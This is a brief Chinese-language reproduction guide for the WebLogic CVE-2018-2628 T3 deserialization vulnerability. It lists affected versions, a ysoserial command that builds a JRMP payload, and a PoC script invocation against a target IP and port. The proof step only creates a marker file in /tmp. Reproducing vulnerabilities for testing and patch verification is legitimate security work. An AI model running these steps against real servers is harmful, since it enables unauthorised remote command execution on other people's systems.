Weblogic_CVE-2018-2628

漏洞概述

    CVE-2018-2628），该漏洞通过t3协议触发，可导致未授权的用户在远程服务器执行任意命令

 

影响版本：

     Weblogic 10.3.6.0

     Weblogic 12.1.3.0

     Weblogic 12.2.1.2

     Weblogic 12.2.1.3

 

漏洞复现

    

    1.通过下载ysoserial启动一个JRMP Listener,开启22801端口，执行命令为'touch /tmp/121212'

 

    2.根据上一步的JRMP Listener生成payload

java -jar ysoserial-<version>-cve-2018-2628-all.jar JRMPClient3 <JRMPListener IP>:<JRMPListener Port> | xxd -p | tr -d $'\n' && echo

 

    3执行POC脚本

 python wls-cve-2018-2628-poc.py 目标IP 目标端口

 

    4.查看JRMP Listener是否有反应

 

    5.查看目标机器上/tmp路径下是否生成121212

 

复现参考地址

https://github.com/tdy218/ysoserial-cve-2018-2628